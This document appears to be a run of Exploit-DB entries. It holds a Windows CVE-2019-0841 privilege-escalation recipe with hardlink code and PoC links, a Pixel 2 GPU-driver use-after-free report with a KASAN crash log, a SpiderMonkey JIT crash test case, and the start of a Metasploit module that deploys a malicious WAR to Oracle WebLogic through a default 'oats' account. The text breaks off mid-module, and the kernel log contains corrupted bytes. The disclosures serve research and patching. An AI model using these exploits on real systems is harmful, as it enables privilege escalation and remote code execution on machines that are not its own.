There is still a vuln in the code triggered by CVE-2019-0841 The bug that this guy found: https://krbtgt.pw/dacl-permissions-overwrite-privilege-escalation-cve-2019-0841/ If you create the following: (GetFavDirectory() gets the local appdata folder, fyi) CreateDirectory(GetFavDirectory() + L"\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_44.17763.1.0_neutral__8wekyb3d8bbwe",NULL); CreateNativeHardlink(GetFavDirectory() + L"\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\Microsoft.MicrosoftEdge_44.17763.1.0_neutral__8wekyb3d8bbwe\\bear3.txt", L"C:\\Windows\\win.ini"); If we create that directory and put an hardlink in it, it will write the DACL. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!IMPORTANT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! Microsoft.MicrosoftEdge_44.17763.1.0_neutral__8wekyb3d8bbwe this part (i.e 44.17763.1.0) has to reflect the currently installed edge version, you will need to mofidy this in the PoC (polarbear.exe) if different. You can find this by opening edge -> settings and scrolling down. Best thing is to just create a folder and hardlink for all the recent edge versions when writing an exploit. But I guess you can also probably get the installed version programmatically. !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!IMPORTANT!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! To repro: 1. Run polarbear.exe 2. Run windowsappslpe.exe (doesn't matter what file you pass in commandline.. will just make win.ini write-able.. rewrite the original PoC yourself) Use the vide demo as guidance.. EDB Note: Download ~ https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46938.zip

The following issue exists in the android-msm-wahoo-4.4-pie branch of https://android.googlesource.com/kernel/msm (and possibly others): When kgsl_mem_entry_destroy() in drivers/gpu/msm/kgsl.c is called for a writable entry with memtype KGSL_MEM_ENTRY_USER, it attempts to mark the entry's pages as dirty using the function set_page_dirty(). This function first loads page->mapping using page_mapping(), then calls the function pointer mapping->a_ops->set_page_dirty. The bug is that, as explained in upstream commit e92bb4dd9673 ( https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=e92bb4dd9673945179b1fc738c9817dd91bfb629), the mapping of a page can be freed concurrently unless it is protected somehow (e.g. by holding the page lock, or by holding a reference to the mapping). For callers who don't hold any such lock or reference, set_page_dirty_lock() is provided to safely mark a page as dirty: ================================== /* * set_page_dirty() is racy if the caller has no reference against * page->mapping->host, and if the page is unlocked. This is because another * CPU could truncate the page off the mapping and then free the mapping. * * Usually, the page _is_ locked, or the caller is a user-space process which * holds a reference on the inode by having an open file. * * In other cases, the page should be locked before running set_page_dirty(). */ int set_page_dirty_lock(struct page *page) { int ret; lock_page(page); ret = set_page_dirty(page); unlock_page(page); return ret; } ================================== To reproduce on a Pixel 2 (walleye): - Check out the tree specified above. - Enable KASAN in the kernel config. - Apply the attached kernel patch kgsl-bigger-race-window.patch to make the race window much bigger. - Build and boot the kernel. - Build the attached poc.c with `aarch64-linux-gnu-gcc -static -o poc poc.c -Wall`. - Run the PoC on the device (adb push, then run from adb shell). You should see a kernel crash like this; note KASAN's report of a UAF in set_page_dirty(): ================================== <6>[ 445.698708] c3 688 mdss_fb_blank_sub: mdss_fb_blank+0x1d0/0x2b4 mode:0 <3>[ 447.372706] c3 2621 ================================================================== <3>[ 447.372963] c3 2621 BUG: KASAN: use-after-free in set_page_dirty+0x4c/0xd0 <3>[ 447.380051] c3 2621 Read of size 8 at addr 0000000000000000 by task kworker/3:3/2621 <3>[ 447.387059] c3 2621 <4>[ 447.394762] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45 <4>[ 447.397158] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT) <4>[ 447.406473] c3 2621 Workqueue: kgsl-mementry _deferred_put <4>[ 447.418479] c3 2621 Call trace: <4>[ 447.418660] c3 2621 [<ffffffa689e8dfbc>] dump_backtrace+0x0/0x2b4 <4>[ 447.421952] c3 2621 [<ffffffa689e8e394>] show_stack+0x14/0x1c <4>[ 447.428066] c3 2621 [<ffffffa68a2f3d2c>] dump_stack+0xa4/0xcc <4>[ 447.433965] c3 2621 [<ffffffa68a07b254>] print_address_description+0x94/0x340 <4>[ 447.439870] c3 2621 [<ffffffa68a07b784>] kasan_report+0x1f8/0x340 <4>[ 447.447145] c3 2621 [<ffffffa68a079a10>] __asan_load8+0x74/0x90 <4>[ 447.453407] c3 2621 [<ffffffa68a0205b4>] set_page_dirty+0x4c/0xd0 <4>[ 447.459621] c3 2621 [<ffffffa68a6c5dec>] kgsl_mem_entry_destroy+0x1c0/0x218 <4>[ 447.465695] c3 2621 [<ffffffa68a6c63d8>] _deferred_put+0x34/0x3c <4>[ 447.473017] c3 2621 [<ffffffa689edc124>] process_one_work+0x254/0x78c <4>[ 447.479093] c3 2621 [<ffffffa689edc6f4>] worker_thread+0x98/0x718 <4>[ 447.485551] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130 <4>[ 447.491801] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40 <3>[ 447.497696] c3 2621 <3>[ 447.503818] c3 2621 Allocated by task 2684: <4>[ 447.506206] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8 <4>[ 447.511847] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20 <4>[ 447.517829] c3 2621 [<ffffffa68a079e74>] kasan_kmalloc.part.5+0x50/0x124 <4>[ 447.523494] c3 2621 [<ffffffa68a07a198>] kasan_kmalloc+0xc4/0xe4 <4>[ 447.529547] c3 2621 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c <4>[ 447.534931] c3 2621 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c <4>[ 447.540572] c3 2621 [<ffffffa68a187bdc>] ext4_alloc_inode+0x28/0x234 <4>[ 447.546387] c3 2621 [<ffffffa68a0afe94>] alloc_inode+0x34/0xd0 <4>[ 447.552112] c3 2621 [<ffffffa68a0b19e8>] new_inode+0x20/0xe8 <4>[ 447.557318] c3 2621 [<ffffffa68a154214>] __ext4_new_inode+0xe8/0x1f00 <4>[ 447.562360] c3 2621 [<ffffffa68a17087c>] ext4_tmpfile+0xb4/0x230 <4>[ 447.568172] c3 2621 [<ffffffa68a09f9e8>] path_openat+0x934/0x1404 <4>[ 447.573556] c3 2621 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188 <4>[ 447.579027] c3 2621 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4 <4>[ 447.584407] c3 2621 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18 <4>[ 447.589787] c3 2621 [<ffffffa689e842b0BCho<D5> ^@^@<90>^A,^A^Hp<D6>M>] el0_svc_naked+0x24/0x28 <3>[ 447.594909] c3 2621 <3>[ 447.599065] c3 2621 Freed by task 36: <4>[ 447.601330] c3 2621 [<ffffffa689e8d624>] save_stack_trace_tsk+0x0/0x1b8 <4>[ 447.606461] c3 2621 [<ffffffa689e8d7f4>] save_stack_trace+0x18/0x20 <4>[ 447.612450] c3 2621 [<ffffffa68a07aa1c>] kasan_slab_free+0xb0/0x1c0 <4>[ 447.618091] c3 2621 [<ffffffa68a0770c0>] kmem_cache_free+0x80/0x2f8 <4>[ 447.623733] c3 2621 [<ffffffa68a1863f8>] ext4_i_callback+0x18/0x20 <4>[ 447.629363] c3 2621 [<ffffffa689f5c430>] rcu_nocb_kthread+0x20c/0x264 <4>[ 447.634926] c3 2621 [<ffffffa689ee59a4>] kthread+0x114/0x130 <4>[ 447.640726] c3 2621 [<ffffffa689e84250>] ret_from_fork+0x10/0x40 <3>[ 447.645765] c3 2621 <3>[ 447.649913] c3 2621 The buggy address belongs to the object at 0000000000000000 <3>[ 447.649913] c3 2621 which belongs to the cache ext4_inode_cache of size 1048 <3>[ 447.652315] c3 2621 The buggy address is located 680 bytes inside of <3>[ 447.652315] c3 2621 1048-byte region [0000000000000000, 0000000000000000) <3>[ 447.667170] c3 2621 The buggy address belongs to the page: <1>[ 447.680933] c3 2621 Unable to handle kernel paging request at virtual address ffffffd8929b3000 <1>[ 447.686392] c3 2621 pgd = 0000000000000000 <1>[ 447.695099] c3 2621 [ffffffd8929b3000] *pgd=0000000000000000, *pud=0000000000000000 <4>[ 447.706506] c3 2621 ------------[ cut here ]------------ <2>[ 447.706664] c3 2621 Kernel BUG at 0000000000000000 [verbose debug info unavailable] <0>[ 447.711676] c3 2621 Internal error: Oops - BUG: 96000047 [#1] PREEMPT SMP <4>[ 447.719517] c3 2621 Modules linked in: <4>[ 447.729365] c3 2621 CPU: 3 PID: 2621 Comm: kworker/3:3 Not tainted 4.4.116-gbcd0ecccd040-dirty #45 <4>[ 447.729573] c3 2621 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT) <4>[ 447.738760] c3 2621 Workqueue: kgsl-mementry _deferred_put <4>[ 447.750779] c3 2621 task: 0000000000000000 task.stack: 0000000000000000 <4>[ 447.750972] c3 2621 PC is at el1_sync+0x28/0xe0 <4>[ 447.757719] c3 2621 LR is at dump_page+0x10/0x18 <4>[ 447.762390] c3 2621 pc : [<ffffffa689e836e8>] lr : [<ffffffa68a04d9dc>] pstate: 204003c5 <4>[ 447.767106] c3 2621 sp : ffffffd8929b2f60 <4>[ 447.775306] c3 2621 x29: ffffffd8929b4000 x28: ffffffd88e9a47d0 <4>[ 447.784631] c3 2621 x27: ffffffd8294fab80 x26: ffffffa68ba1f000 <4>[ 447.789927] c3 2621 x25: ffffffd8536fc908 x24: ffffffd8536fc4e8 <4>[ 447.795219] c3 2621 x23: ffffffd892e55500 x22: 0000000000000001 <4>[ 447.800513] c3 2621 x21: ffffffa68ba1aa00 x20: 0000000000000000 <4>[ 447.805809] c3 2621 x19: ffffffbe214dbe00 x18: 0000007f7dc4ef8a <4>[ 447.811105] c3 2621 x17: 0000007f809eb0e0 x16: ffffffa68a0a5178 <4>[ 447.816400] c3 2621 x15: 0000000000000021 x14: 202c303030303030 <4>[ 447.821694] c3 2621 x13: 3030303030303030 x12: e95cc056ac940c73 <4>[ 447.826992] c3 2621 x11: ffffffd8929fb810 x10: ffffff8b12978008 <4>[ 447.832286] c3 2621 x9 : ffffff8b12978007 x8 : ffffffa68a21a558 <4>[ 447.837590] c3 2621 x7 : ffffffa68c69ec28 x6 : 0000000000000040 <4>[ 447.842872] c3 2621 x5 : 0000000000000000 x4 : ffffff87c429b7c0 <4>[ 447.848170] c3 2621 x3 : ffffffa68a04d8dc x2 : 0000000000000000 <4>[ 447.853468] c3 2621 x1 : ffffffa68ba1aa00 x0 : ffffffbe214dbe00 <4>[ 447.858765] c3 2621 <4>[ 447.858765] c3 2621 PC: 0xffffffa689e836a8: <4>[ 447.859009] c3 2621 36a8 d503201f d503201f d503201f d503201f d503201f d503201f a90007e0 a9010fe2 <4>[ 447.873684] c3 2621 36c8 a90217e4 a9031fe6 a90427e8 a9052fea a90637ec a9073fee a90847f0 a9094ff2 <4>[ 447.881847] c3 2621 36e8 a90a57f4 a90b5ff6 a90c67f8 a90d6ffa a90e77fc 9104c3f5 d538411c f9400794 <4>[ 447.890005] c3 2621 3708 f90093f4 d2c01014 f9000794 d5384036 d5384017 a90f57fe d503201f d5382015 <4>[ 447.898172] c3 2621 <4>[ 447.898172] c3 2621 LR: 0xffffffa68a04d99c: <4>[ 447.898371] c3 2621 d99c b000ce80 9113e000 97feface aa1303e0 9400affc f9400260 9117e2e1 528002a2 <4>[ 447.91300BCho<D6> ^@^@<90>^A+^A<98>3<8E><DA>8] c3 2621 d9bc 9106c021 8a000280 97ffff2c 17ffffe6 a9bf7bfd d2800002 910003fd 97ffffb4 <4>[ 447.921170] c3 2621 d9dc a8c17bfd d65f03c0 a9ac7bfd 910003fd a90153f3 a9025bf5 a90363f7 a9046bf9 <4>[ 447.929328] c3 2621 d9fc a90573fb d10443ff aa0003f3 9400afe5 aa1303e0 f8410402 f90033a2 9400af97 <4>[ 447.937494] c3 2621 <4>[ 447.937494] c3 2621 SP: 0xffffffd8929b2f20: <4>[ 447.937693] c3 2621 2f20 8a04d9dc ffffffa6 929b2f60 ffffffd8 89e836e8 ffffffa6 204003c5 00000000 <4>[ 447.952331] c3 2621 2f40 00000000 00000000 00000000 00000000 ffffffff ffffffff 00000000 00000000 <4>[ 447.960491] c3 2621 2f60 214dbe00 ffffffbe 8ba1aa00 ffffffa6 00000000 00000000 8a04d8dc ffffffa6 <4>[ 447.968651] c3 2621 2f80 c429b7c0 ffffff87 00000000 00000000 00000040 00000000 8c69ec28 ffffffa6 <4>[ 447.976809] c3 2621 <0>[ 447.976941] c3 2621 Process kworker/3:3 (pid: 2621, stack limit = 0x0000000000000000) <4>[ 447.979247] c3 2621 Call trace: <4>[ 447.987122] c3 2621 Exception stack(0xffffffd8929b2d60 to 0xffffffd8929b2e90) <4>[ 447.990662] c3 2621 2d60: ffffffbe214dbe00 0000008000000000 00000000836e2000 ffffffa689e836e8 <4>[ 447.997788] c3 2621 2d80: 00000000204003c5 0000000000000025 ffffffd8536fc908 0000000000000000 <4>[ 448.006468] c3 2621 2da0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000 <4>[ 448.015098] c3 2621 2dc0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000 <4>[ 448.023777] c3 2621 2de0: 0000000000000000 0000000000000000 0000000000000000 0000000000000000 <4>[ 448.032461] c3 2621 2e00: 0000000000000000 0000000000000000 0000000000000000 0000000000000000 <4>[ 448.041195] c3 2621 2e20: 0000000000000000 e95cc056ac940c73 ffffffbe214dbe00 ffffffa68ba1aa00 <4>[ 448.049872] c3 2621 2e40: 0000000000000000 ffffffa68a04d8dc ffffff87c429b7c0 0000000000000000 <4>[ 448.058561] c3 2621 2e60: 0000000000000040 ffffffa68c69ec28 ffffffa68a21a558 ffffff8b12978007 <4>[ 448.067216] c3 2621 2e80: ffffff8b12978008 ffffffd8929fb810 <4>[ 448.075867] c3 2621 [<ffffffa689e836e8>] el1_sync+0x28/0xe0 <0>[ 448.081787] c3 2621 Code: a90637ec a9073fee a90847f0 a9094ff2 (a90a57f4) <4>[ 448.087496] c3 2621 ---[ end trace 8d4b2347f8b71fe7 ]--- <4>[ 448.087540] c4 2684 ------------[ cut here ]------------ <2>[ 448.087544] c4 2684 Kernel BUG at 0000000000000000 [verbose debug info unavailable] <0>[ 448.087547] c4 2684 Internal error: Oops - BUG: 96000005 [#2] PREEMPT SMP <4>[ 448.087553] c4 2684 Modules linked in: <4>[ 448.087561] c4 2684 CPU: 4 PID: 2684 Comm: poc Tainted: G D 4.4.116-gbcd0ecccd040-dirty #45 <4>[ 448.087563] c4 2684 Hardware name: Qualcomm Technologies, Inc. MSM8998 v2.1 (DT) <4>[ 448.087565] c4 2684 task: 0000000000000000 task.stack: 0000000000000000 <4>[ 448.087578] c4 2684 PC is at qlist_free_all+0x3c/0x80 <4>[ 448.087581] c4 2684 LR is at qlist_free_all+0x7c/0x80 <4>[ 448.087585] c4 2684 pc : [<ffffffa68a07bbbc>] lr : [<ffffffa68a07bbfc>] pstate: 60400145 <4>[ 448.087586] c4 2684 sp : ffffffd87e3b3880 <4>[ 448.087591] c4 2684 x29: ffffffd87e3b3880 x28: ffffffa68ca1a000 <4>[ 448.087595] c4 2684 x27: 000000000591e848 x26: ffffffd87e3b3920 <4>[ 448.087598] c4 2684 x25: 0000000000000140 x24: 0000000000000000 <4>[ 448.087601] c4 2684 x23: ffffffd87e3b3920 x22: ffffffa68a07bbbc <4>[ 448.087604] c4 2684 x21: 0000000000000000 x20: ffffffd8929f8040 <4>[ 448.087607] c4 2684 x19: ffffffd8929f8040 x18: 00000000c8056d20 <4>[ 448.087611] c4 2684 x17: 000000002c754130 x16: 0000000085837409 <4>[ 448.087613] c4 2684 x15: 00000000a50d5ad3 x14: 0000000000000000 <4>[ 448.087617] c4 2684 x13: 0000000001075000 x12: ffffffffffffffff <4>[ 448.087620] c4 2684 x11: 0000000000000040 x10: ffffff8b0fc76746 <4>[ 448.087623] c4 2684 x9 : ffffff8b0fc76745 x8 : ffffffd87e3b3a2b <4>[ 448.087626] c4 2684 x7 : 0000000000000000 x6 : ffffffd87e3b3a08 <4>[ 448.087629] c4 2684 x5 : fffffffffe8c0000 x4 : 0000000000000000 <4>[ 448.087632] c4 2684 x3 : fBCho<D7> ^@^@<90>^A*^A<91><F9>%5fffffd8929f7ff0 x2 : 0000000000000000 <4>[ 448.087635] c4 2684 x1 : dead0000000000ff x0 : 0000000000000000 <4>[ 448.087637] c4 2684 <4>[ 448.087637] c4 2684 PC: 0xffffffa68a07bb7c: <4>[ 448.087646] c4 2684 bb7c 17fffff1 a9bc7bfd 910003fd a90153f3 a9025bf5 f9001bf7 f9400013 b4000253 <4>[ 448.087655] c4 2684 bb9c 90000016 aa0103f5 aa0003f7 912ef2d6 14000002 aa1403f3 aa1503e0 b40001f5 <4>[ 448.087664] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff <4>[ 448.087673] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93 <4>[ 448.087675] c4 2684 <4>[ 448.087675] c4 2684 LR: 0xffffffa68a07bbbc: <4>[ 448.087684] c4 2684 bbbc b980c401 aa1603e2 f9400274 cb010261 97fff36f b5ffff14 f90006ff f90002ff <4>[ 448.087692] c4 2684 bbdc f9000aff a94153f3 a9425bf5 f9401bf7 a8c47bfd d65f03c0 aa1303e0 97ffff93 <4>[ 448.087701] c4 2684 bbfc 17fffff0 a9bc7bfd aa0003e2 910003fd a90153f3 f0012ed3 aa0003f4 b000eb40 <4>[ 448.087711] c4 2684 bc1c 910083a1 d538d083 913c8000 f90013bf 8b000060 f9452a63 f9001fa3 f90017bf <4>[ 448.087712] c4 2684 <4>[ 448.087712] c4 2684 SP: 0xffffffd87e3b3840: <4>[ 448.087722] c4 2684 3840 8a07bbfc ffffffa6 7e3b3880 ffffffd8 8a07bbbc ffffffa6 60400145 00000000 <4>[ 448.087731] c4 2684 3860 7e3b3920 ffffffd8 00000000 00000000 00000000 00000080 8b4ddfd0 ffffffa6 <4>[ 448.087740] c4 2684 3880 7e3b38c0 ffffffd8 8a07bf9c ffffffa6 8c656000 ffffffa6 8ca1f500 ffffffa6 <4>[ 448.087749] c4 2684 38a0 8ca1a000 ffffffa6 000000f7 00000000 8c68d000 ffffffa6 fabb3a00 ffffffd7 <4>[ 448.087750] c4 2684 <0>[ 448.087753] c4 2684 Process poc (pid: 2684, stack limit = 0x0000000000000000) <4>[ 448.087754] c4 2684 Call trace: <4>[ 448.087758] c4 2684 Exception stack(0xffffffd87e3b3680 to 0xffffffd87e3b37b0) <4>[ 448.087763] c4 2684 3680: ffffffd8929f8040 0000008000000000 00000000836e2000 ffffffa68a07bbbc <4>[ 448.087768] c4 2684 36a0: 0000000060400145 0000000000000025 0000000000000140 ffffffd7fabb3a00 <4>[ 448.087773] c4 2684 36c0: 0000000000000000 ffffffd87e3b37d0 ffffffd87e3b3720 ffffffa68a0768e0 <4>[ 448.087779] c4 2684 36e0: ffffffbe224a7d80 0000000000000000 ffffffd7fabb3a00 ffffffd7fabb3a00 <4>[ 448.087784] c4 2684 3700: 0000000100150015 ffffffd8929f7e00 0000000180150014 ffffffd899803b00 <4>[ 448.087789] c4 2684 3720: ffffffd87e3b3830 ffffffa68a078b38 ffffffbe224a7d80 ffffffd8929f7ff0 <4>[ 448.087794] c4 2684 3740: ffffffd7fabb3a00 e95cc056ac940c73 0000000000000000 dead0000000000ff <4>[ 448.087799] c4 2684 3760: 0000000000000000 ffffffd8929f7ff0 0000000000000000 fffffffffe8c0000 <4>[ 448.087804] c4 2684 3780: ffffffd87e3b3a08 0000000000000000 ffffffd87e3b3a2b ffffff8b0fc76745 <4>[ 448.087808] c4 2684 37a0: ffffff8b0fc76746 0000000000000040 <4>[ 448.087813] c4 2684 [<ffffffa68a07bbbc>] qlist_free_all+0x3c/0x80 <4>[ 448.087819] c4 2684 [<ffffffa68a07bf9c>] quarantine_reduce+0x17c/0x1a0 <4>[ 448.087824] c4 2684 [<ffffffa68a07a1b4>] kasan_kmalloc+0xe0/0xe4 <4>[ 448.087828] c4 2684 [<ffffffa68a07a964>] kasan_slab_alloc+0x14/0x1c <4>[ 448.087832] c4 2684 [<ffffffa68a078030>] kmem_cache_alloc+0x144/0x27c <4>[ 448.087840] c4 2684 [<ffffffa68a15d0dc>] ext4_inode_attach_jinode+0x9c/0x118 <4>[ 448.087844] c4 2684 [<ffffffa68a150d74>] ext4_file_open+0xc8/0x21c <4>[ 448.087848] c4 2684 [<ffffffa68a087488>] do_dentry_open+0x350/0x4ec <4>[ 448.087851] c4 2684 [<ffffffa68a087930>] finish_open+0x74/0xa8 <4>[ 448.087857] c4 2684 [<ffffffa68a09fa34>] path_openat+0x980/0x1404 <4>[ 448.087861] c4 2684 [<ffffffa68a0a1a50>] do_filp_open+0x98/0x188 <4>[ 448.087866] c4 2684 [<ffffffa68a089004>] do_sys_open+0x170/0x2d4 <4>[ 448.087869] c4 2684 [<ffffffa68a0891a0>] SyS_openat+0x10/0x18 <4>[ 448.087875] c4 2684 [<ffffffa689e842b0>] el0_svc_naked+0x24/0x28 <0>[ 448.087881] c4 2684 Code: 14000002 aa1403f3 aa1503e0 b40001f5 (b980c401) <4>[ 448.087944] c4 2684 ---[ end trace 8d4DBGC ================================== The KASAN report points to instruction 267c in the following assembly: ================================== 0000000000002630 <set_page_dirty>: { 2630: a9bd7bfd stp x29, x30, [sp, #-48]! 2634: 910003fd mov x29, sp 2638: a90153f3 stp x19, x20, [sp, #16] 263c: f90013f5 str x21, [sp, #32] 2640: aa0003f3 mov x19, x0 struct address_space *mapping = page_mapping(page); 2644: 94000000 bl 0 <page_mapping> 2648: aa0003f4 mov x20, x0 264c: d5384115 mrs x21, sp_el0 if (current->jh_task_flags && mapping) 2650: 9128a2a0 add x0, x21, #0xa28 2654: 94000000 bl 0 <__asan_load4> 2658: b94a2aa0 ldr w0, [x21, #2600] 265c: 340000a0 cbz w0, 2670 <set_page_dirty+0x40> 2660: b40003b4 cbz x20, 26d4 <set_page_dirty+0xa4> msleep(500); 2664: 52803e80 mov w0, #0x1f4 // #500 2668: 94000000 bl 0 <msleep> 266c: 14000002 b 2674 <set_page_dirty+0x44> if (likely(mapping)) { 2670: b4000334 cbz x20, 26d4 <set_page_dirty+0xa4> int (*spd)(struct page *) = mapping->a_ops->set_page_dirty; 2674: 9101a280 add x0, x20, #0x68 2678: 94000000 bl 0 <__asan_load8> 267c: f9403694 ldr x20, [x20, #104] 2680: 91006280 add x0, x20, #0x18 2684: 94000000 bl 0 <__asan_load8> 2688: f9400e94 ldr x20, [x20, #24] 268c: aa1303e0 mov x0, x19 2690: 94000000 bl 0 <__asan_load8> 2694: f9400260 ldr x0, [x19] ================================== Proof of Concept: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/46941.zip

While fuzzing Spidermonkey, I encountered the following (commented and modified) JavaScript program which crashes debug builds of the latest release version of Spidermonkey (from commit https://github.com/mozilla/gecko-dev/commit/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c): function O1() { this.s = 'foobar'; this.a = 42; // Avoid unboxed layout for O1 instances as this will cause the JIT // compiler to behave differently and not emit the ObjectGroupDispatch // operation (see below). delete this.a; } // This function will be inlined below in v4, together with the default // Object.prototype.toString implementation. // This just demonstrates that a custom function can be inlined which // will make assumptions about the input ObjectGroup. O1.prototype.toString = function() { return this.s; }; function v4(v5) { // Once v22 is allocated as unboxed object, this will convert it to a // native object, which will cause its ObjectGroup to change. delete v5.nonExistent; // The call to .toString here will be implemented as a switch // (ObjectGroupDispatch operation) on the ObjectGroup with two cases // (ObjectGroup of v22 and v17). Depending on the input, the dispatch will // jump to one of the two inlined implementations of toString. However, // after v22 is allocated as UnboxedObject (still with the same // ObjectGroup as before), the delete operation above will convert it back // to a NativeObject, now changing the ObjectGroup. Afterwards, this // ObjectGroupDispatch operation will see an unexpected ObjectGroup and, // in debug builds, crash with an assertion failure. In release builds // it will just fallthrough to whichever branch was emitted right after // the dispatch operation. return v5.toString(); } function v11() { const v22 = {p: 1337}; v4(v22); let v26 = 0; do { const v17 = new O1; v4(v17); v26++; } while (v26 < 100); } for (let v33 = 0; v33 < 100; v33++) { const v37 = v11(); } The program will crash with an assertion similar to: > ../build_DBG.OBJ/dist/bin/js crash.js Assertion failure: Unexpected ObjectGroup, at js/src/jit/MacroAssembler.cpp:2014 [1] 54116 trace trap ../build_DBG.OBJ/dist/bin/js crash.js It appears that roughly the following is happening here: * Initially, the objects v22 and v17 will be allocated as native objects with two different ObjectGroups (an ObjectGroup [1] stores type information such as the prototype object and property/method types for an object): OG1 and OG2. * Function v4 will be called repeatedly with objects of both ObjectGroups and will eventually be JIT compiled by IonMonkey. At that point, it will be compiled to expect an object with ObjectGroup OG1 or OG2 based on type feedback from the interpreter/baseline JIT and will be deoptimized if it is ever called with an object of a different group. * The call to .toString in v4 will be optimized by inlining [2] the two possible implementations (O1.prototype.toString and Object.prototype.toString) and then performing a switch on the ObjectGroup of the input to determine which implementation to jump to. The switch is implemented by the ObjectGroupDispatch operation. Since both input ObjectGroups are covered, the instruction does not have a default (fallback) path [3]. * At a later point, the allocation site of v22 is modified to create an object with unboxed layout [4] which will store its properties inline in an unboxed form but still use ObjectGroup OG1. * Afterwards, in the JIT code for v4, the delete operation converts the UnboxedObject back to a NativeObject [5], this time changing the ObjectGroup to a new group OG3 [6]. * Finally, when executing the machine code for the ObjectGroupDispatch operation, the new ObjectGroup matches none of the expected ones. At this point the program will crash with an assertion in debug builds. In release builds, it would now simply fall through to whichever one of the inlined implementations was directly following the ObjectGroupDispatch operation. At least this way of triggering the bug is related to UnboxedObjects, which have recently been disabled by default: https://github.com/mozilla/gecko-dev/commit/26965039e60a00b3600ce2e6a559106e4a3a30ca However, I am not sure if the conversion from unboxed to native objects due to the property deletion is the only reason that an object's ObjectGroup can change unexpectedly (in this situation). As for exploitation, it might be possible to cause a type confusion by causing a fallthrough to the inlined code for the other ObjectGroup. In that case, the inlined code would expect to receive an object of a specific ObjectGroup and might omit further security checks based on that. For this specific sample it seems that the fallthrough path always happens to be the correct one (i.e. the one for Object.prototype.toString), but I assume it could also be the other way around in a different context. Furthermore, it might be possible to cause other code constructs (apart form the ObjectGroupDispatch) that rely on ObjectGroup information to misbehave in this situation. [1] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/ObjectGroup.h#L87 [2] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/IonBuilder.cpp#L4517 [3] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/IonBuilder.cpp#L4923 [4] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.cpp#L1416 [5] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.cpp#L1150 [6] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.cpp#L756

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report def initialize(info={}) super(update_info(info, 'Name' => 'Oracle Application Testing Suite WebLogic Server Administration Console War Deployment', 'Description' => %q{ This module abuses a feature in WebLogic Server's Administration Console to install a malicious Java application in order to gain remote code execution. Authentication is required, however by default, Oracle ships with a "oats" account that you could log in with, which grants you administrator access. }, 'License' => MSF_LICENSE, 'Author' => [ 'Steven Seeley', # Used the trick and told me about it 'sinn3r' # Metasploit module ], 'Platform' => 'java', 'Arch' => ARCH_JAVA, 'Targets' => [ [ 'WebLogic Server Administration Console 12 or prior', { } ] ], 'References' => [ # The CVE description matches what this exploit is doing, but it was for version # 9.0 and 9.1. We are not super sure whether this is the right CVE or not. # ['CVE', '2007-2699'] ], 'DefaultOptions' => { 'RPORT' => 8088 }, 'Notes' => { 'SideEffects' => [ IOC_IN_LOGS ], 'Reliability' => [ REPEATABLE_SESSION ], 'Stability' => [ CRASH_SAFE ] }, 'Privileged' => false, 'DisclosureDate' => 'Mar 13 2019', 'DefaultTarget' => 0)) register_options( [ OptString.new('TARGETURI', [true, 'The route for the Rails application', '/']), OptString.new('OATSUSERNAME', [true, 'The username for the admin console', 'oats']), OptString.new('OATSPASSWORD', [true, 'The password for the admin console']) ]) register_advanced_options( [ OptString.new('DefaultOatsPath', [true, 'The default path for OracleATS', 'C:\\OracleATS']) ]) end class LoginSpec attr_accessor :admin_console_session end def login_spec @login_spec ||= LoginSpec.new end class OatsWarPayload < MetasploitModule attr_reader :name attr_reader :war def initialize(payload) @name = [Faker::App.name, Rex::Text.rand_name].sample @war = payload.encoded_war(app_name: name).to_s end end def default_oats_path datastore['DefaultOatsPath'] end def war_payload @war_payload ||= OatsWarPayload.new(payload) end def set_frsc value = get_deploy_frsc @frsc = value end def check res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'console', 'login', 'LoginForm.jsp') }) if res && res.body.include?('Oracle WebLogic Server Administration Console') return Exploit::CheckCode::Detected end Exploit::CheckCode::Safe end def set_admin_console_session(res) cookie = 